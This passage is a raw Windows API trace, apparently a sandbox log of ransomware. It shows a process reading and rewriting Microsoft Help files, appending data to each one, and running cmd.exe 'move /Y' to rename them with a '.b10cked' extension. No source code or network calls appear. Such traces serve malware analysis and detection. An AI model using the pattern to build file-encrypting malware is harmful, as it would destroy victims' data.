hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.307] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.308] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.309] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.309] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.309] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.309] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.309] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GRAPH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.313] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.314] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.314] CloseHandle (hObject=0x120) returned 1 [0197.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN") returned 0x27 [0197.315] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.315] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xb8c, dwThreadId=0xa24)) returned 1 [0197.336] CloseHandle (hObject=0x1b4) returned 1 [0197.336] CloseHandle (hObject=0x120) returned 1 [0197.336] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.336] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.336] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.336] ReleaseMutex (hMutex=0xf8) returned 1 [0197.336] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25430758791) returned 1 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.518] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.519] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14c [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.520] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14c [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.521] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.521] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0197.522] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.522] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0197.522] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0197.523] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0197.523] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0197.523] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0197.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0197.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GROOVE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0197.528] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14c [0197.528] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.529] CloseHandle (hObject=0x120) returned 1 [0197.529] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN") returned 0x27 [0197.530] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.531] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x698, dwThreadId=0x62c)) returned 1 [0197.641] CloseHandle (hObject=0x1b4) returned 1 [0197.641] CloseHandle (hObject=0x120) returned 1 [0197.641] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.641] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.641] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.641] ReleaseMutex (hMutex=0xf8) returned 1 [0197.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25443137687) returned 1 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.643] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 